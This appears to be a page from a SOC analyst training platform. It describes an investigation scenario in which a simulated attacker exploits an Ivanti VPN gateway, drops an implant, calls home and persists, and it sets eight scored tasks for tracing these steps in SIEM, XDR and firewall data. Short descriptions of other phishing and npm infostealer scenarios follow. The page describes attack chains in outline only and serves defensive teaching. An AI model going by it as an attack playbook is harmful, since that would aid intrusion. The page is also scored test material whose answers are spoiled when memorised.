
Edge Device Exploitation: VPN Zero-Day
Investigate a breach targeting exposed edge security appliances. In this scenario, an attacker exploits Ivanti Connect Secure CVE-2025-22457 to obtain unauthenticated code execution, spawns a shell from the gateway web process, retrieves a Linux payload, and attempts to preserve access using edge-device service abuse patterns similar to FortiGate SSL-VPN post-exploitation tradecraft. Analyze SIEM, XDR, and firewall evidence to identify the spawned shell, suspicious domain, local sync script, and defensive block policy.
Start this operation
Investigation Tasks
Complete each task by investigating alerts and submitting your findings.
Pinpointing the Sensor That Paged the SOC
5Your shift opens with a perimeter security alert: an exploit attempt was flagged against the internet-facing gateway corp-ivnt-gw-01 from an external IP. Before tracing the attacker, establish provenance — pivot to the SIEM panel, locate the exploit-detection event, and determine which internal monitoring system raised it (the value recorded in its log source field).
Confirming Code Execution on the Gateway
10With the detecting sensor confirmed, pivot to what the exploit actually achieved. During the gateway compromise the exposed web service was driven to spawn a process it should never launch — a clear sign the adversary obtained command execution. Work the XDR process hierarchy for corp-ivnt-gw-01 and identify the name of that anomalous child process.
Recovering the Implant Staged on the Gateway
5Having confirmed the interpreter the exploit spawned, follow what it did next. That process reached out to external infrastructure and wrote a file to the gateway's disk — the attacker's first-stage implant. Using the XDR file artifacts and the suspicious process command line on corp-ivnt-gw-01, identify the exact filename written to disk.
Identifying the Implant's Callback Host
5The implant on the gateway did not act alone — shortly after it landed, an outbound HTTP request left the environment toward attacker-controlled infrastructure. A SIEM network-proxy event was flagged high severity against the usual informational noise. Inspect that flagged proxy event and determine the external domain the internal host tried to reach.
Crediting the Control That Stopped the Callback
10You now know where the gateway implant tried to phone home. The good news: the perimeter held. When the gateway shell attempted a follow-up connection back to that same external host, an automated firewall policy denied the session. Inspect the firewall panel, locate the blocked outbound session, and name the defensive policy that stopped it.
Hunting the Attacker's Foothold on the Gateway
5Containment bought time, but an adversary who exploited the gateway will try to survive a reboot. An alert fired for potential persistence on corp-ivnt-gw-01: the init system was seen spawning a long-running service process that should not be a direct child of init. Examine the XDR process hierarchy for the gateway and submit the full command line used to launch that persistent service.
Tracing the Pivot Onto the LDAP Server
5With the gateway foothold mapped, widen the scope inward. During host triage of the directory server srv-ldap-01, a root cron entry was found running a local shell script shortly after the edge-device compromise — a likely lateral-movement or staging step deeper in the network. Review the relevant SIEM cron message and identify the name of the script that was executed.
Resolving the Follow-On Activity on the DevOps Workstation
5The investigation's final thread leads off the perimeter and onto an internal endpoint. Several days after the gateway was compromised, follow-on activity surfaced on the developer workstation wks-devops-01: an operator launched a PowerShell script tied to edge-configuration work. Walk the XDR process ancestry on that host and determine the exact filename of the PowerShell script that was run.
8 tasks · 50 points total
Training Tools
Skills You'll Build
Requires foundational alert triage skills. Multiple data sources to correlate.
Prerequisites
- Basic understanding of security alerts
- Familiarity with SIEM concepts
- Familiarity with XDR concepts
- Familiarity with Firewall concepts
Ready to investigate?
More Operations
View allCredential Harvesting: The Lookalike Login
Investigate an adversary-in-the-middle (AiTM) credential phishing campaign that lured an employee to a lookalike Microsoft 365 login page. Working entirely from SIEM logs, you will identify the lookalike domain, reconstruct the multi-hop redirect chain through a compromised legitimate site, uncover a secondary phishing wave against another employee, and confirm account takeover in Azure AD sign-in logs via impossible travel and session-token replay. You finish by choosing the containment action that actually evicts an attacker holding a valid session token. Foundational skills for SOC analysts in lookalike-domain analysis and identity-centric incident response.
Malicious npm Package: Postinstall Infostealer
A developer at a software company installs a typosquatted npm package. The package's postinstall hook silently reads environment variables, SSH keys, and cloud credentials from the user profile and POSTs them to an attacker endpoint before the terminal even finishes. Trace the process tree, the file reads, and the exfiltration traffic to reconstruct the full chain.
QR Code Phishing: Scan to Compromise
In this scenario, you will investigate a modern 'Quishing' (QR phishing) attack that bypassed traditional email filters by hiding its payload inside an image. You will trace the full chain: a spoofed MFA-enrollment lure sent from purpose-built infrastructure, a redirect server that conceals the final destination, and an Evilginx-style adversary-in-the-middle page that stole an authenticated session cookie despite MFA. You will then follow the attacker's post-compromise moves — Graph API mailbox enumeration, SharePoint exfiltration, and a hidden inbox forwarding rule — and choose the containment action that actually evicts them.